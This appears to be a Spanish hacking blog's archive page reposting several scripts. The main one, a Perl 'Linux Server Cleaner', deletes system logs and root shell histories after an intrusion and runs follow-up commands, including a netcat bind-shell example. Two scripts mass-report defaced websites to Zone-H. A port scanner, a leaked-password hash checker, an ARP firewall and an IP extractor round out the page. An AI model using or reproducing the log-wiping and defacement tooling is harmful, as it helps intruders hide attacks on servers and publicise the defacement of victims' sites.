Mostrando entradas con la etiqueta Hacking. Mostrar todas las entradas
Mostrando entradas con la etiqueta Hacking. Mostrar todas las entradas

BH-Linux Server Cleaner

d
Nombre: BH-Linux Server Cleaner
Autor: Br4v3-H34r7
Visto en Shipcode's Misadventures 
#!/usr/bin/perl
#==============================================================#
# BH-LSC 1.0 (BH-Linux Server Cleaner Version 1.0)
# Coded By: Br4v3-H34r7
# Contact: R00T[AT]Br4v3-H34r7[DOT]CoM
# Website: Br4v3-H34r7.CoM | BH2H.CoM
# License: GNU General Public License 3
#==============================================================#
# NOT FOR ILLEGAL USAGE - NOT FOR SCRIPT KIDDIES
#==============================================================#
# BEGIN THE CODE
{
 $uid = getpwuid($>); # Get User ID
 if($uid eq "root") # If root
 {
  @logs = ("/var/log/lastlog", "/var/log/messages", "/var/log/warn", "/var/log/wtmp", "/var/log/poplog", "/var/log/qmail", "/var/log/smtpd", "/var/log/telnetd", "/var/log/secure", "/var/log/auth", "/var/log/auth.log", "/var/log/cups/access_log", "/var/log/cups/error_log", "/var/log/thttpd_log", "/var/log/spooler", "/var/spool/tmp", "/var/spool/errors", "/var/spool/locks", "/var/log/nctfpd.errs", "/var/log/acct", "/var/apache/log", "/var/apache/logs", "/usr/local/apache/log", "/usr/local/apache/logs", "/usr/local/www/logs/thttpd_log", "/var/log/news", "/var/log/news/news", "/var/log/news.all", "/var/log/news/news.all", "/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice", "/var/log/news/suck.err", "/var/log/news/suck.notice", "/var/log/xferlog", "/var/log/proftpd/xferlog.legacy", "/var/log/proftpd.xferlog", "/var/log/proftpd.access_log", "/var/log/httpd/error_log", "/var/log/httpsd/ssl_log", "/var/log/httpsd/ssl.access_log", "/var/adm", "/var/run/utmp", "/etc/wtmp", "/etc/utmp", "/etc/mail/access", "/var/log/mail/info.log", "/var/log/mail/errors.log", "/var/log/httpd/*_log", "/var/log/ncftpd/misclog.txt", "/var/account/pacct", "/var/log/snort", "/var/log/bandwidth", "/var/log/explanations", "/var/log/syslog", "/var/log/user.log", "/var/log/daemons/info.log", "/var/log/daemons/warnings.log", "/var/log/daemons/errors.log", "/etc/httpd/logs/error_log", "/etc/httpd/logs/*_log", "/var/log/mysqld/mysqld.log"); # Logs Locations
  @shells_history = ("/root/.ksh_history", "/root/.bash_history", "/root/.sh_history", "/root/.history", "/root/*_history", "/root/.login", "/root/.logout", "/root/.bash_logut", "/root/.Xauthority"); # Shells History Locations
  if(@ARGV eq 0)
  {
   print "\n\t+--------------------------+\n";
   print "\t|        BH-LSC 1.0        |\n";
   print "\t|   Coded By Br4v3-H34r7   |\n";
   print "\t| Br4v3-H34r7.CoM|BH2H.CoM |\n";
   print "\t+--------------------------+\n\n";
   
   print "[*] FastMode Usage: perl $0 [Seconds] [Command(s)]\n";
   print "[*] EXAMPLE: perl $0 30 \"nc -l -p 3434 -e /bin/bash\"\n\n";
   
   print "[+] Start Clean The Server? (Y/N): ";
   chomp($Clean = ); # Get The Answer
   $LClean = "\L$Clean"; # Make User Input Lowercase Character
    if($LClean eq "y") # Answer Yes
    {
     print "[+] Clean The Server After You Exit? (Y/N): ";
     chomp($AfterExit = ); # Get The Answer
     $LAfterExit = "\L$AfterExit"; # Make User Input Lowercase Character
     if($LAfterExit eq "y") # Answer Yes
     {
      print "[+] After How Many Time? (Seconds): ";
      chomp($Seconds = ); # Get The Seconds
      
      print "[+] Run Custom Command After Cleaning The Logs? (Y/N): ";
      chomp($RunAfter = ); # Get The Answer
      $LRunAfter = "\L$RunAfter"; # Make User Input Lowercase Character
       if ($LRunAfter eq "y") # Answer Yes
       {
        print "    (1) Make This Tool Remove It Self\n";
        print "    (2) Delete Custom File From The Server\n";
        print "    (3) Get File To The Server (Using \"wget\")\n";
        print "    (4) Don't Allow Any Server Connections (Using \"iptables\" Firewall)\n";
        print "    (5) Use Other Or Multi Commands (Use \";\" Between The Commands)\n";
        
        print "[+] Enter The Number Of Your Choice: ";
        chomp($theanswer = ); # Get The Answer
         if($theanswer eq 1) # Make This Tool Remove It Self
         {
          use Cwd qw(realpath);
          $toolpath = realpath($0); # Get The Tool Name
          $command = ("rm -rf \"$toolpath\""); # Set After Exit Command
         } 
         elsif($theanswer eq 2) # Delete Custom File From The Server
         {
          print "[+] Enter File Location: ";
          chomp($file = ); # Get File Location
          $command = ("rm -rf \"$file\""); # Set After Exit Command
         }
         elsif($theanswer eq 3) # Get File To The Server
         {
          print "[+] Enter File URL: ";
          chomp($wget_url = ); # Get File URL
          print "[+] Enter Save Location: ";
          chomp($wget_location = ); # Get Save Location
          $command = ("wget -O $wget_location $wget_url"); # Set After Exit Command
         }
         elsif($theanswer eq 4) # Don't Allow Any Server Connections
         {
          print "[+] DANGEROUS This Choice Will Make The Server Drop INPUT/OUTPUT/FORWARD Connections (Y/N): ";
          chomp($answer5 = ); # Get The Answer
          $Lanswer5 = "\L$answer5"; # Make User Input Lowercase Character
           if ($Lanswer5 eq "y") # Answer Yes
           {
            $command = ("/sbin/iptables -F;/sbin/iptables -P INPUT DROP;/sbin/iptables -P OUTPUT DROP;/sbin/iptables -P FORWARD DROP"); # Set After Exit Command
           }
           else # Error Input
           {
            print "[!] Error: Wrong Input... Skipped!\n";
           }
         } 
         elsif($theanswer eq 5) # Use Other Or Multi Commands
         {
          print "[+] Enter The Command(s): ";
          chomp($command = ); # Set After Exit Command
         }
         else # Error Input
         {
          print "[!] Error: Wrong Input... Skipped!\n";
         } 
       }
       elsif($LRunAfter eq "n") # Answer No
       {
        print "[-] Answer No, Run Custom Command After Cleaning The Logs... Skipped!\n";
       }
       else # Error Input
       {
        print "[!] Error: Wrong Input... Skipped!\n";
       }
       print "[+] You Have \"$Seconds\" Seconds To Exit The Server\n";
       sleep $Seconds; # Wait For Some Seconds
     } 
     elsif($LAfterExit eq "n") # Answer No
     {
      print "[-] Answer No, Delete Server Logs After Exit... Skipped!\n";
     }
     else # Error Input
     {
      print "[!] Error: Wrong Input... Skipped!\n";
     }
      print "[+] Start Cleaning The Server...\n";
      sleep 2; # Wait For 2 Seconds
      
      unlink @logs; # Deleting System Logs
      print "[+] Server Logs Deleted Successfully\n";
      sleep 2; # Wait For 2 Seconds
      
      unlink @shells_history; # Deleting Shells History
      print "[+] Shells History Deleted Successfully\n\n";
      
      system $command; # Run The Command
    }
    elsif($LClean eq "n") # Answer No
    {
     print "[-] Answer No, Exit With Out Cleaning... Exit!\n";
    }
    else # Error Input
    {
     print "[!] Error: Wrong Input... Exit!\n";
    }
  }
  else # FastMode
  {
   sleep $ARGV[0]; # Wait For Some Seconds
   unlink @logs; # Deleting System Logs
   unlink @shells_history; # Deleting Shells History
   system $ARGV[1]; # Run The Command(s)
  }
 }
 else # If Not root
 {
  print "[!] Error: You Must Be Server \"root\" To Use This Tool... Exit!\n";
 }
} 
# END THE CODE
#==============================================================#
Leer más...
Publicado por Snifer en 10:00 0 comentarios
Etiquetas: , , , , , , ,

Zone-H Reporter Perl

d
Autor: PrinceofHacking Descripción: Script realizado en Perl que nos permite interactuar con ZOne-H para reportar. 


#!/usr/bin/perl
 
#####################################
#                Zone-H Notify                                          #                                 
#####################################
 
############
use LWP::UserAgent;
############
system('cls');
system ('title Powered By PrinceofHacking');
############
 
print "                         #####################\n   ";
print "                      #    Zone-Notify    #\n  ";
print "                       #        USO        #\n  ";
print "                       # [1] Single Deface #\n";
print "                         # [2] Mass   Deface #\n";
print "                         # [3] Help & About  #\n";
print "                         #####################\n\n   ";
 
$pick=;
if ($pick>3) {
print "Unknown Command\n";
}
if ($pick ==1)
{
 
print "Mode : Single Deface\n\n";
print "Defacer [Nickname] :\n";
$Def=;
print "Dominio:\n";
$Dom=;
if ($Dom =~ /http:\/\//)
{
$U="http://zone-h.org/notify/single";
$lwp=LWP::UserAgent->new;
$res=$lwp  -> post($U,[
'defacer'     => $Def,
'domain1'   => $Dom,
'hackmode' => '15',
'reason'       => '1',
'submit'       => 'Send',
]);
if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
print "Result => $1";
}
else
{
print "Error\n";
}
}
else
{
$new="http://" . "$Dom";
$U="http://zone-h.org/notify/single";
$lwp=LWP::UserAgent->new;
$res=$lwp  -> post($U,[
'defacer'     => $Def,
'domain1'   => $new,
'hackmode' => '15',
'reason'       => '1',
'submit'       => 'Send',
]);
if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
print "Result => $1";
}
else
{
print "Error\n";
}
}
}
#############################################Mass###########################################
if ($pick == 2){
print "Mode : Mass Deface\n\n";
open(site,"owned.txt");
 
@ARRAY=;
 
close site;
print "Defacer [Nickname] :\n";
$Def=;
foreach $mass(@ARRAY){
if ($mass !~ /http:/) {
$mass='http://' . $mass;
}
print "$mass\n";
 
$U="http://zone-h.org/notify/single";
$lwp=LWP::UserAgent->new;
$res=$lwp  -> post($U,[
'defacer'     => $Def,
'domain1'   => $mass,
'hackmode' => '15',
'reason'       => '1',
'submit'       => 'Send',
]);
if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
print "Result => $1\n\n";
}
else
{
print "Error\n";
}
}
}
#####################About##############
if ($pick ==3)
{
print "Para la opcion [2] crear un texto con las paginas y guardarlo como : owned.txt\n";
print "Example\n";
print "http://link.com\n";
print "http://link2.com\n";
print "http://link3.com\n\n";
}
Leer más...
Publicado por Snifer en 5:00 0 comentarios
Etiquetas: , ,

Zone-H Reporter

d
Autor: @SankoSK
Descripcion: Script que interactua con Zone H permitiendo reportar desde la querida terminal. 
Nombre: ZoneHReporter.py

###################
#!/usr/bin/python #
# Zone-H Reporter #
# Coded by Sanko  #
###################
 
import urllib,urllib2
 
def main():
        options = """
#######################
#                     #
#  Zone - H Reporter  #
#  [0] Login          #
#  [1] Single Deface  #
#  [2] Mass Deface    #
#  [i] info methods   #
#                     #
#######################"""
 
        print options
        entrada = raw_input("Choose an option -> ")
        if entrada == 0:
                login('user','password')
        elif entrada == 1:
                uploadsingle('defacer','http://web.com/','15','1')
        elif entrada == 2:
                uploadmass('defacer','15','1') #Deben indicar en la funcion los domains defaceados
        elif entrada == 'i':
                info()
        else:
                print "Error , try again\n"
                main()
 
def login(user,password):
        url = 'http://www.zone-h.org/login'
        values = {'user':user,
                 'password':password}
 
        data = urllib.urlencode(values)
        req = urllib2.Request(url, data)
        resp = urllib2.urlopen(req)
        page = resp.read()
        print page
 
def uploadsingle(defacer,domain,hackmode,reason):
        url = 'http://www.zone-h.org/notify/single'
        values = {'defacer':defacer,
                  'domain1':domain,
                  'hackmode':hackmode,
                  'reason':reason,
                  'submit':'Send'}
 
        data = urllib.urlencode(values)
        req = urllib2.Request(url, data)
        resp = urllib2.urlopen(req)
        page = resp.read()
        print page
 
 
def uploadmass(defacer,hackmode,reason):
        url = 'http://www.zone-h.org/notify/mass'
        values = {'defacer':defacer,
                  'domain1':'',
                  'domain2':'',
                  'domain3':'',
                  'domain4':'',
                  'domain5':'',
                  'domain6':'',
                  'domain7':'',
                  'domain8':'',
                  'domain9':'',
                  'domain10':'',
                  'domain1':domain,
                  'hackmode':hackmode,
                  'reason':reason,
                  'submit':'Send'}
 
        data = urllib.urlencode(values)
        req = urllib2.Request(url, data)
        resp = urllib2.urlopen(req)
        page = resp.read()
        print page
 
def info():
        hackmodes = """
        [1] known vulnerability (i.e. unpatched system)
        [2] undisclosed (new) vulnerability
        [3] configuration / admin. mistake
        [4] brute force attack
        [5] social engineering
        [6] Web Server intrusion
        [7] Web Server external module intrusion
        [8] Mail Server intrusion
        [9] FTP Server intrusion
        [10] SSH Server intrusion
        [11] Telnet Server intrusion
        [12] RPC Server intrusion
        [13] Shares misconfiguration
        [14] Other Server intrusion
        [15] SQL Injection
        [16] URL Poisoning
        [17] File Inclusion
        [18] Other Web Application bug
        [19] Remote administrative panel access through bruteforcing
        [20] Remote administrative panel access through password guessing
        [21] Remote administrative panel access through social engineering
        [22] Attack against the administrator/user (password stealing/sniffing)
        [23] Access credentials through Man In the Middle attack
        [24] Remote service password guessing
        [25] Remote service password bruteforce
        [26] Rerouting after attacking the Firewall
        [27] Rerouting after attacking the Router
        [28] DNS attack through social engineering
        [29] DNS attack through cache poisoning
        [30] Not available
        [31] Cross-Site Scripting"""
 
        reasons = """
        [1] Heh...just for fun!
        [2] Revenge against that website
        [3] Political reasons
        [4] As a challenge
        [5] I just want to be the best defacer
        [6] Patriotism
        [7] Not available"""
        
        entrada = raw_input("info hackmodes | info reasons   --- > ")
        if entrada == "hackmodes":
                print hackmodes
        elif entrada == "reasons":
                print reasons
        else:
                print "Error"
                
 
main()

Leer más...
Publicado por Snifer en 19:13 0 comentarios
Etiquetas: , , ,

pentestlab_scanner.sh

d
Nombre: pentestlab_scanner.sh
Autor: netbiosX
Descripción: Script que actúa como un simple scanner de puertos TCP
Visto en Pentestlab 
#!/bin/bash
#Autor: netbiosX
#Website:https://pentestlab.wordpress.com
#Defining the variables
IP=$1
firstport=$2
lastport=$3

function portscan
{
	for ((counter=$firstport; counter<=$lastport; counter++))
		do
		 	(echo > /dev/tcp/$IP/$counter) > /dev/null 2>&1 && echo "$counter -- open"
		done
}

portscan

Permisos: chmod 700 pentestlab_scanner.sh 

Ejecución: ./pentestlab_scanner.sh [ IP ] [ Primer Puerto ] [ Último Puerto ]
Leer más...
Publicado por Snifer en 10:00 0 comentarios
Etiquetas: , , , , , ,

Script para verificar la clave de una DB y verificar si fue crackeada

d
Autor: Desconocido
Descripción: Script en Python para verificar la presencia de la clave en la DB y si fué crackeada.

#! /usr/bin/env python

from hashlib import sha1
import getpass

def get_hash(plaintext, offset=5):
  hashed = sha1(plaintext).hexdigest()
  return '0' * offset + hashed[offset:]

def check_database(database, plaintext):
  uncracked_hash = get_hash(plaintext, 0)
  cracked_hash = get_hash(plaintext)

  database.seek(0);
  line_count = 0

  for line in database:
    line_count += 1
    if uncracked_hash in line:
      print ">Found somethng on line: %d" % line_count
      return ">Warning: Your password hash is in the database but uncracked. :|"
    elif cracked_hash in line:
      print ">Found somethng on line: %d" % line_count
      return ">Warning: Your password hash is in the database and was cracked. :["

  print ">Checked all %d lines" % line_count
  return "All Clear: your password hash isn't in the database! :]"



def main():
  database = open("combo_not.txt")
  while(True):
    password = getpass.getpass("Input a password to check: \n").strip()

    print check_database(database, password) 
    print "\n\n"
    

if __name__ == "__main__":
    main()
Visto en Twitter
Leer más...
Publicado por Snifer en 19:52 0 comentarios
Etiquetas: , , , , , , ,

Arp Firewall

d
Autor: @kmlreverser
Descripción: Por si alguien esta sacando provecho a la red wifi del vecino.Por cierto tambien bloquea los ataques Man in the middle
(Necesita tener instalado arptables)


#!/bin/bash

#Arp Firewall
 
case "$1" in
start)
        sudo arptables -P INPUT DROP
        sudo arptables -P OUTPUT ACCEPT
        sudo echo  "La Proteccion ARP está  Activada"
        ;;
 
        stop)
        sudo arptables -P INPUT ACCEPT
        sudo arptables -P OUTPUT ACCEPT
        echo  "La Proteccion ARP está  Desactivada"
        ;;
 
        *)
         echo "Usar: /etc/init.d/blah {start|stop}"
         exit 1
        ;;
        esac
 
exit 0

Leer más...
Publicado por Unknown en 20:44 0 comentarios
Etiquetas: , , , ,

Script para buscar direcciones IP en páginas html

d
Autor: @paco_medina
Función: Recibe como parámetro una URL y muestra en pantalla las direcciones IP que contenga.
#!/bin/bash
# Programa que busca direcciones IP en páginas html
# Autor: @paco_medina
if [ $# -lt 1 ]; then
echo "Uso: $0 url"
echo "Ejemplo: $0 www.sitio.com.mx"
exit 1
fi
HTML=/tmp/pagina.html
DOMINIO=`echo $1|cut -d. -f2-5`
wget $1 -O $HTML -o /dev/null
grep "href=" $HTML |grep $DOMINIO |
cut -d/ -f3|grep ${DOMINIO}$|sort -u>/tmp/dir-ip
for i in $(cat /tmp/dir-ip)

do
host $i
done
rm $HTML
Leer más...
Publicado por Unknown en 12:53 0 comentarios
Etiquetas: , , ,
Suscribirse a: Comentarios (Atom)